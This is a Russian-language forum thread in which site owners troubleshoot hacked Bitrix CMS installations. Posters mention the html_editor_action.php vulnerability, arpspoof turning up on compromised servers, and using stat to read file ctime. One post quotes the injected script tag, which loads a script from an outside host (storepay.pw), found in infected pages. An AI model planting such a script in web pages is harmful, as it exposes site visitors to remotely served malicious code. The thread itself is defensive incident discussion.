Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...
|
Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...
|
|
|
|
|
|
Я если честно пока ветку дочитал просто чуть со смеху не помер, есть хоть кто то кто осознал проблему BITRIX , хоть кто-то кто понимает что вся линейка BITRIX просто дыра возможно не умышленно сделали лазейки для себя а возможно по тупости и некомпетентности. Скачал свежую сборочку и проверил на несколько видов атак.. был удивлен и разочарован, дыры пришлось устранять самостоятельно, разочарую всех у кого не VPS ... ГОТОВЬТЕСЬ К ВЗЛОМУ ИЛИ ПРОСТО ИЩИТЕ НОВЫЙ ДВИЖОК...
|
|
|
|
|
|
|||
|
|
|
|
Алексей Чебанов, поясните этот момент
Какие именно виды атак на свежей сборки прошли? Какие дыры Вы залатали? |
|||
|
|
|
|
Еще раз отвечу и думаю поставлю точку. Я не могу Вам тут описать метод взлома и уязвимости БИТРИКС это не законно, кому нужна свежая сборка скачивайте виртуальную машину и далее делайте стандартную установку предложенными в упаковке скриптами. Чтоб как то себя обезопасить делайте копию рабочего сайта каждые 12 часов. Я готов выложить компании Битрикс решения для ВПС серверов . А ведь помница мне как я ругался с поддержкой и ранее описывал им их ошибки и халатность, допрыгались , слушать надо когда Вам что то говорят , а не оскорблять. Пожинаем плоды дебилокодеров
|
|
|
|
|
|
Алексей Чебанов, Вас оскорбляли?
Так и не понял, чем решение для vps будет отличаться от решения для шаред хостинга |
|
|
|
|
Решениями он поделится, без тебя эксперта разберутся. Делать копию каждые 12 часов... а почему не 6? Вовремя обновляться надо и следовать лучшим практикам безопасности, вот и все. |
|||
|
|
|
|
История получила продолжение
Проверяйте у себя /usr/sbin/arpspoof И если он есть, то вероятно ваша сеть (ессно помимо сервера) скомпроментированы |
|
|
|
|
|
Это если кроны битры выполнялись от рута вероятно
Многие не учитывают почему-то этот момент |
|
|
|
|
Зачем кому-то это делать? |
|||
|
|
|
По сути изучают внутреннюю сеть для дальнейших атак Выяснили как раз за счёт спуфинга некоторых адресов наших клиентов У всех жертв общее это выделенный сервер с уязвимой битрой и кронами от рута |
|||
|
|
|
Автоматизация Торговли (319758.ru)
|
|||
|
|
|
Дак это ж всё - сразу "Привет" Скрипт будет выполняться от рута, со всеми вытекающими ... |
|||
|
|
|
Автоматизация Торговли (319758.ru)
|
|||
|
|
|
|
=)
|
|
|
|
|
|
|||
|
|
|
Обновление ядра не помогло ранее. |
|||||
|
|
|
|
в prolog и core.js нет вредоносных строк, а код сайта встраивается <sc ript src='https://storepay.pw/jqueryui.js'></sc ript> Где может еще прятаться?
|
|
|
|
|
судя по информации в статьях из предыдущего поста - с большой долей вероятности вас взломали через уязвимость html_editor_action.php - все симптомы взлом "на лицо" на сайте, где в данный момент занимаюсь этой проблемой обнаружил тоже самое "снос" данной папки Вам вообще ничего не даст - это следы взлома, нужно защищать html_editor_action.php либо обновляться |
|||
|
|
|
|
|||
|
|
|
|
|||
|
|
|
|
Да, хотел бы прояснить одну ситуацию: дата изменения файла. Говорите, что файл main.php и прочие были модифицированы последний раз очень давно. Если бы не одно "но". Из PHP дата изменения файла меняется через команду touch(). Эта команда меняет время модификации файла, так называемый mtime. Но она не меняет время изменения статуса файла, т.е. время изменения свойств и метаданных файла, т.е. ctime. В консоли линукса нужно запустить команду stat имя_файла, т.е. например, чтобы посмотреть ctime для файла /bitrix/components/bitrix/main.file.input/main.php, вводим:
В итоге мы получим такую картину:
Это подтвердилось в ситуации, когда я проверял другой файл. 26.12.2022 года была сделана резервная копия сайта и развернута на компе, 27.12.2022 в проверяемом файле появились изменения, но дата изменения этого файла стояла вообще апрелем 2022. На компе же изменений в этом файле не оказалось. И только командой stat смог узнать, что на самом деле файл был изменен 27.12.2022. Так что те, у кого файл датирован то 2019 годом, то еще каким-то, проверьте строку "Change" через команду stat (если, конечно, сами этот файл не трогали). |
|||||||
|
|
|
|
Александр Оносов, спасибо, коллега, что подробно разъяснил этот момент начинающим программистам - мне было лень это писать) Добавлю, что поиск изменённых файлов надо делать с помощью флага ctime, а не mtime:
Перед НГ преступники взломали один интернет-магазин, используя уязвимость bitrix/tools/html_editor_action.php. Пришлось разбираться с этим несколько часов. Если бы директория хранения временных файлов была вынесена за пределы сайта, то у преступника ничего не получилось бы.
Создание и поддержка сайтов:
|
|||
|
|
|
почему Вы так решили? на сколько я понимаю там несколько другой механизм задействован - т.е. /upload/tmp/ это не = директория хранения временных файлов |
||||
|
|
|
|||